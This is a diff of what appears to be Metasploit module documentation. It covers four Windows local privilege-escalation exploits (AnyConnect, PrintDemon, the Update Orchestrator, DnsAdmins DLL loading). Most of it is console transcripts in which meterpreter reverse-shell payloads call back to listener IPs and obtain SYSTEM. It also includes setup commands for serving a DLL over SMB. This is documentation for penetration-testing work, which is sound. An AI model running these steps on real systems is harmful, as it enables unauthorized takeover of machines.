-  [*] IPC Command: "CAC-nc-install	-ipc=18201	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
-  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
-  [*] Send the encoded IPC command (size = 270 bytes)
-  [*] Sending stage (176195 bytes) to 172.16.60.202
-  [*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
-  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
-  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
-  [*] Shutdown the socket
-
-  meterpreter > getuid
-  Server username: NT AUTHORITY\SYSTEM
-  meterpreter > sysinfo
-  Computer        : DESKTOP-UUQE0B4
-  OS              : Windows 10 (10.0 Build 18363).
-  Architecture    : x64
-  System Language : en_US
-  Domain          : WORKGROUP
-  Logged On Users : 2
-  Meterpreter     : x86/windows
-  ```
-
-### Windows 7 SP1 (x86) with AnyConnect 4.5.5030
-
-  ```
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
-  SESSION => 8
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
-  payload => windows/meterpreter/reverse_tcp
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
-  LHOST => 172.16.60.1
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
-  LPORT => 4445
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
-  verbose => true
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
-
-  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
-  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
-  [*] The target appears to be vulnerable.
-  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
-
-  [*] Started reverse TCP handler on 172.16.60.1:4445
-  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
-  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
-  [*] "-ipc" argument not needed
-  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
-  [*] IPC Command: "CAC-nc-install	C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
-  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
-  [*] Send the encoded IPC command (size = 247 bytes)
-  [*] Sending stage (176195 bytes) to 172.16.60.134
-  [*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
-  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
-  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
-  [*] Shutdown the socket
-
-  meterpreter > getuid
-  Server username: NT AUTHORITY\SYSTEM
-  meterpreter > sysinfo
-  Computer        : WIN7-DEV
-  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
-  Architecture    : x86
-  System Language : en_US
-  Domain          : WORKGROUP
-  Logged On Users : 2
-  Meterpreter     : x86/windows
-  ```
@@ -6,8 +6,8 @@ links, an attacker can take advantage of this vulnerability to write arbitrary f
 user.

 This vulnerability affects all Windows versions from Windows 7 onwards, up to but not including Windows 10 v2004. Note
-that exploiting the vulnerabilty on its own does not allow an attacker to gain privileges; rather an attacker must find
-a DLL hijacking vulnerabilty or similar in a SYSTEM level service that they can exploit using the arbitrary file move 
+that exploiting the vulnerability on its own does not allow an attacker to gain privileges; rather an attacker must find
+a DLL hijacking vulnerability or similar in a SYSTEM level service that they can exploit using the arbitrary file move 
 provided by CVE-2020-0787 in order to gain privileges.

 Presently the module solves this issue by taking advantage of a DLL hijacking vulnerability within the Update Session 
@@ -0,0 +1,184 @@
+## Vulnerable Application
+
+Vulnerable versions for exploit
+All unpatched windows through version 2003
+
+### Introduction
+
+This exploit relies on a bug where you can create a virtual printer
+and print to trusted locations on the filesystem.  If a user chooses the
+default overwrite, it may create a permanent backdoor.
+
+Basically, this exploit creates a print job that writes to a trusted
+location.  By selecting the location ```C:\windows\system32\ualapi.dll```
+we abuse the spooler service twice.  The spooler will print to this
+location when it restarts, then it will load the DLL into itself when it
+restarts a second time.  The DLL will then be running as ```SYSTEM```.
+
+When the printer is created, the target will show a pop-up saying a
+printer weas created.
+A larger issue here is that the Spooler service does not like to stop.
+Trying `sc stop` Spooler does not stop the spooler.
+Killing the pid with a trusted process will kill it, but it restarts
+automatically.
+Using the `pendingFileRenameOperations` registry key also does not appear
+to work.
+
+## Verification Steps
+
+ Start ```msfconsole```
+ get session on a windows target that is not patched (and <= 2003)
+ ```use windows/local/cve_2020_1048_printerdemon```
+ ```set session <session>```
+ ```set payload <payload>```
+ ```set lhost <lhost>```
+ ```set lport <lport>```
+ ```run```
+ Verify target reboots automagically if 
+ reboot target again (yest it has to reboot again
+ Verify you get a session
+
+## Options
+
+  **EXECUTE_DELAY**
+  The time between uploading and running the exploit.  Default is 3
+  seconds, but high-latency networks may require more time.
+
+  **EXPLOIT_NAME**
+  The name of the when it is uploaded to the target (%RAND% by default).
+  
+  **EXPLOIT_DIR**
+  Directory to use for file upload and linking; this should not already
+  exist. (%RAND% by default)
+
+  **OVERWRITE_DLL**
+  The remote location you would like to write to.  Default is
+  ```C:\windows\system32\ualapi.dll```
+
+  **PAYLOAD_NAME**
+  The filename to use for the payload binary (%RAND% by default).
+  This is the name of the dll payload when uploaded to the remote host.
+
+  **RESTART_TARGET**
+  This will restart the target to force the overwrite.  YOU WILL LOSE
+  YOUR SESSION unless you have a method of persistence.
+  The dll will not be run until a second reboot.
+
+  **WRITEABLE_DIR**
+  The directory to use the payload binary and uploaded payload.
+  (%RAND% by default).
+
+## Scenarios
+
+### Tested on Windows10 x64 Release 1903
+
+  ```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 2
+
+[*] Started reverse TCP handler on 192.168.135.197:5555 
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
+[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500
+
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-CL5L2IH
+OS              : Windows 10 (10.0 Build 18362).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-CL5L2IH\msfuser
+meterpreter > getsystem
+[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon 
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options
+
+Module options (exploit/windows/local/cve_2020_1048_printerdemon):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   EXECUTE_DELAY   3                yes       The number of seconds to delay between file upload and exploit launch
+   EXPLOIT_NAME                     no        The filename to use for the exploit binary (%RAND% by default).
+   OVERWRITE_DLL                    no        Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
+   PAYLOAD_NAME                     no        The filename for the payload to be used on the target host (%RAND%.dll by default).
+   RESTART_TARGET  true             yes       Restart the target after exploit (you will lose your session until a second reboot).
+   SESSION         1                yes       The session to run this module on.
+   WRITABLE_DIR                     no        Path to write binaries (%TEMP% by default).
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
+verbose => true
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
+disablepayloadhandler => false
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
+wfsdelay => 600
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
+
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
+session => 2
+msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run
+
+[*] Started reverse TCP handler on 192.168.135.197:4444 
+[*] Checking Target
+[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
+[*] Build Number = 18362
+[*] Uploading Payload
+[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
+[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
+[*] Sleeping for 3 seconds before launching exploit
+[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
+[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
+[*] Running Exploit
+[*] Exploit output:
+Printer created successfully
+[*] Rebooting DESKTOP-CL5L2IH
+[*] 192.168.132.134 - Meterpreter session 2 closed.  Reason: Died
+```
+
+After the auto-reboot, reboot again.
+The first reboot performs the overwrite; the second loads the dll.
+
+```
+[*] Sending stage (200262 bytes) to 192.168.132.134
+[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-CL5L2IH
+OS              : Windows 10 (10.0 Build 18362).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
@@ -0,0 +1,197 @@
+## Vulnerable Application
+
+Windows 10 and Server x64 build versions above 17763  to 19041.
+
+### Introduction
+
+This module abuses CVE-2020-1313, a unchecked API call that allows a
+regular user to schedule a job that will run as system.  The API call,
+`ScheduleWork`, will create a task in the System Update Orchestrator
+automatically scheduled to run at a time when the system is expected
+to be idle.  The user cannot request or affect the scheduled time of
+execution.  The scheduled job data is stored in
+`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\x`
+Where `x` is a numeric key assigned to the job.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2.  use exploit/multi/handler
+  3. set payload <payload>
+  4. set [r|l]host
+  5. run (leave running)
+  6. Start msfconsole
+  7. use windows/local/cve_2020_1313_system_orchestrator
+  8. set session <session>
+  9. set payload <payload_matching_above>
+  10. set verbose true
+  11. Verify The job is scheduled
+  12. Leave everything running
+  13. Go to bed
+  14. Have a healthy Breakfast, maybe some coffee if you want
+  15. verify you got a callback as SYSTEM
+
+## Options
+
+  **EXECUTE_DELAY**
+  The number of seconds to sleep after uploading the exploit and
+  launching it.
+
+  **EXPLOIT_NAME**
+  The name of the exploit EXE as it will appear on target
+  
+  **EXPLOIT_TIMEOUT**
+  The maximum time to wait for a response from the exploit binary.
+
+  **PAYLOAD_NAME**
+  The name of the payload EXE as it will appear on target
+
+  **WRITABLE_DIR**
+  Directory to use for file upload and linking; this should not already
+  exist.  This directory will require manual cleanup.
+
+## Scenarios
+
+### Tested on Windows10 x64 Release 1903
+
+```
+[*] Sending stage (200262 bytes) to 192.168.132.134
+[*] Meterpreter session 12 opened (192.168.135.197:4567 -> 192.168.132.134:49678) at 2020-09-21 19:05:44 -0500
+sessions -i -1
+[*] Starting interaction with 12...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-CL5L2IH
+OS              : Windows 10 (10.0 Build 18362).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-CL5L2IH\msfuser
+meterpreter > getsystem
+[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 12...
+msf6 exploit(windows/local/cve_2020_1313_system_orchestrator) > show options
+
+Module options (exploit/windows/local/cve_2020_1313_system_orchestrator):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
+   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
+   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
+   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
+   SESSION          11               yes       The session to run this module on.
+   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
+   LPORT     4568             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf6 exploit(windows/local/cve_2020_1313_system_orchestrator) > set session 12
+session => 12
+msf6 exploit(windows/local/cve_2020_1313_system_orchestrator) > run
+
+[*] Build Number = 18362
+[*] Checking Target
+[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 12
+[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
+[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
+[*] Uploading Payload to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
+[*] Payload (7168 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\DZrvSSK.exe
+[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\DZrvSSK.exe
+[*] Running Exploit
+[*] Exploit Output:
+Obtaining reference to IUniversalOrchestrator
+Scheduling work with id 47790
+Succeeded. You may verify HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.
+[*] Cleaning up C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
+[*] C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe already exists on the target. Deleting...
+[*] Deleted C:\Users\msfuser\AppData\Local\Temp\IXCDRgFFVCSThK.exe
+[+] Payload Scheduled for execution at 2020-09-22 08:53:47 -0500
+msf6 exploit(windows/local/cve_2020_1313_system_orchestrator) > 
+
+[SECONDARY WINDOW FOR CALLBACK]
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler 
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.135.197
+lhost => 192.168.135.197
+msf6 exploit(multi/handler) > set lport 4444
+lport => 4444
+msf6 exploit(multi/handler) > run -j
+msf6 exploit(multi/handler) > jobs -l
+
+Jobs
+====
+
+  Id  Name                    Payload                              Payload opts
+  --  ----                    -------                              ------------
+  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4444
+
+msf6 exploit(multi/handler) > set lport 4568
+lport => 4568
+msf6 exploit(multi/handler) > run -j
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.135.197:4568 
+msf6 exploit(multi/handler) > jobs -l
+
+Jobs
+====
+
+  Id  Name                    Payload                              Payload opts
+  --  ----                    -------                              ------------
+  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4444
+  1   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.135.197:4568
+
+msf6 exploit(multi/handler) > 
+[*] Sending stage (200262 bytes) to 192.168.132.134
+[*] Meterpreter session 3 opened (192.168.135.197:4568 -> 192.168.132.134:49681) at 2020-09-21 20:09:45 -0500
+msf6 exploit(multi/handler) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-CL5L2IH  192.168.135.197:4568 -> 192.168.132.134:49681 (192.168.132.134)
+
+msf6 exploit(multi/handler) > sessions -i 3
+[*] Starting interaction with 3...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-CL5L2IH
+OS              : Windows 10 (10.0 Build 18362).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+
+```
@@ -0,0 +1,348 @@
+## Vulnerable Application
+
+Windows Server 2003 and above
+
+#### Introduction
+This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at
+`HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\` named `ServerLevelPluginDll` that can be
+made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL
+being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.
+
+Note that if the option to drop the DLL file on the host is selected (instead of the option to use a UNC path), there is a possibility
+that antivirus may detect the DLL file and remove it. In this case it will not be possible to restart the DNS service via the
+Service Manager without first clearing out the `ServerLevelPluginDll` value of the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
+key using an account with administrator privileges.
+
+To avoid the potential of this occurring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
+how long they would like to wait for any potential AV to pick up on the file after which the module will then check to
+ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key.
+
+It should also be noted that the UNC path option may run into a similar issue if an incorrect IP address is typed in, so users should
+be especially careful when setting the value of `DLLPATH` to ensure that they don't inadvertently set an incorrect IP address and thereby
+prevent the DNS server from being able to restart.
+
+This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows
+Server version up to and including Windows Server 2019.
+
+### Setup Steps (Windows Server 2019 Standard)
+1. Install Windows Server 2019 Standard with GUI
+2. Install and configure Active Directory Domain Services and DNS services.
+3. Promote the server to a domain controller once the initial setup wizard is
+   complete. This will complete the setup of the AD.
+4. Reboot
+5. Add a new user which I called normal and set its password to a long string such as
+`thisIsADamnGoodPassword123!`. Don't use any other special characters or you may end up
+violating the default password policy.
+6. Add this new user to two groups: `DnsAdmins` (should have been created with the installation of
+the DNS server and the AD Server), and `Remote Desktop Users`.
+See https://www.snel.com/support/create-user-and-allow-rdp-permission-on-windows-server-2016/ for info
+on how to do this.
+7. To go `Group Policy Management -> Forest -> Domains -> *your domain name* -> Domain Controllers ->
+Default Domain Controllers Policy` and right click on it, then select Edit. From here select Policies ->
+Windows Settings -> Security Settings -> Local Policies -> User Right Managements and then select
+the Allow log on locally policy underneath this and double click on it. Ensure the Define these
+policy settings option is checked, and then select Add User or Group and add in the name of the
+user that you just created. It should look something in the format of *domain name*\*user name*.
+Then click Apply and click OK.
+8. Run gpupdate again.
+9. Reboot
+10. You should now be able to log in as the new user, which should also be in the DnsAdmins group.
+You can confirm this by running `net localgroup DnsAdmins` and confirming that the new user is
+listed as a member of this group in the output returned.
+11. Run `wmic useraccount where name='*username of the new account*'` to get the SID of the
+new account that you added in earlier.
+12. Run `sc sdset "DNS" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CR;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;RPWPDTLO;;;S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`
+in an elevated command prompt replacing the sample SID with the SID obtained via the earlier command
+(aka the SID of the new low privileged user you added).
+
+## Verification Steps
+
+1. Get a Meterpreter shell
+2. `use exploit/windows/local/dnsadmin_serverlevelplugindll`
+3. `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
+4. `set LHOST <lhost>`
+5. `set LPORT <lport>`
+6. `set SESSION <session_no>` to specify session
+7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
+8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or if you want to use a UNC path
+9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
+10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write
+the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`
+
+## Options
+
+### DLLNAME
+Name of the DLL to use.
+
+### DLLPATH
+Location of the DLL to use. If a UNC path is provided, the module will assume that the operator
+has already performed the following actions:
+1. Set up a working SMB2 share (via a tool such as Impacket's `smbserver.py` via a command such as
+`sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/`
+2. Created a DLL of the same architecture as the target system and placed in within this share.
+
+### MAKEDLL
+If set to `true`, then just create the DLL, do not conduct the full exploit.
+The resulting DLL will be stored in the `~/.msf4/local` directory.
+
+### AVTIMEOUT
+Time, in seconds, to wait for any AV on the target system to potentially pick up on the
+dropped DLL file, prior to the module checking to see if the DLL file still exists. This
+is needed to prevent a scenario where the DLL file gets removed and the module tries to make
+changes that could prevent the DNS server from being able to start.
+
+## Scenarios
+
+### Windows Server 2019 Standard x64, writing `msf.dll` to `%TEMP%`
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+s[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    msf.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    false            yes       Just create the DLL, do not exploit.
+   SESSION                     yes       The session to run this module on.
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.17.168.195   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set RHOST 172.17.169.123
+RHOST => 172.17.169.123
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1 
+SESSION => 1
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 7788
+LPORT => 7788
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Checking service state...
+[*] Building DLL...
+[+] Wrote DLL to C:\Users\normal\AppData\Local\Temp\1\msf.dll!
+[*] Sleeping for 60 seconds to ensure the file wasn't caught by any AV...
+[+] Looks like our file wasn't caught by the AV.
+[!] Entering danger section...
+[*] Modifying ServerLevelPluginDll to point to C:\Users\normal\AppData\Local\Temp\1\msf.dll...
+[+] Registry property serverlevelplugindll successfully reset.
+[*] Restarting the DNS service...
+[*] Started bind TCP handler against 172.17.169.123:7788
+[*] Sending stage (200262 bytes) to 172.17.169.123
+[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.17.169.123:7788) at 2020-09-09 14:48:59 -0500
+
+meterpreter > 
+[+] Exited danger zone successfully!
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x64/windows  RAPID7\normal @ WIN-M5JU6L5RA9L        0.0.0.0:0 -> 172.17.169.123:4444 (172.17.169.123)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-M5JU6L5RA9L  0.0.0.0:0 -> 172.17.169.123:7788 (172.17.169.123)
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : WIN-M5JU6L5RA9L
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : RAPID7
+Logged On Users : 12
+Meterpreter     : x64/windows
+meterpreter > 
+```
+
+### Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
+The easiest way to set this up is to Impacket's `smbserver`. You can find the source code for Impacket at https://github.com/SecureAuthCorp/impacket.
+Download the latest release and untar it, then `cd` into the new directory that is created. You should see a file named `setup.py`. Run the command
+`sudo python3 setup.py install` and it will install Impacket for you. Once this is done, navigate to the `examples` directory and follow the following steps:
+
+```
+ ~/Desktop/impacket-0.9.21/examples  sudo python3 smbserver.py -smb2support -ip 172.17.168.195 test /home/gwillcox/.msf4/local/
+Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
+
+[*] Config file parsed
+[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+[*] Config file parsed
+[*] Config file parsed
+[*] Config file parsed
+
+```
+
+This will create a SMBv2 server, listening on IP address 172.17.168.195, with a share named `test`, that will be sharing the contents of
+the directory at `/home/gwillcox/.msf4/local/`. Next, set `MAKEDLL` to `true` and run the module to generate the payload.
+
+```
+msf6 exploit(multi/handler) > use exploit/windows/local/dnsadmin_serverlevelplugindll 
+[*] Using configured payload windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 3 
+SESSION => 3
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/bind_tcp
+PAYLOAD => windows/x64/meterpreter/bind_tcp
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 6688
+LPORT => 6688
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
+MAKEDLL => true
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > show options
+
+Module options (exploit/windows/local/dnsadmin_serverlevelplugindll):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   AVTIMEOUT  60               yes       Time to wait for AV to potentially notice the DLL file we dropped, in seconds.
+   DLLNAME    mp4.dll          yes       DLL name (default: msf.dll)
+   DLLPATH    %TEMP%           yes       Path to DLL. Can be a UNC path. (default: %TEMP%)
+   MAKEDLL    true             yes       Just create the DLL, do not exploit.
+   SESSION    3                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     6688             yes       The listen port
+   RHOST     172.17.169.123   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Building DLL...
+[+] mp4.dll stored at /home/gwillcox/.msf4/local/mp4.dll
+[*] Started bind TCP handler against 172.17.169.123:6688
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > 
+```
+
+Once the DLL has been generated, one can proceed with the actual exploit:
+```
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
+MAKEDLL => false
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\172.17.168.195\\test
+DLLPATH => \\172.17.168.195\test
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME mp4.dll
+DLLNAME => mp4.dll
+msf6 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
+
+[*] Checking service state...
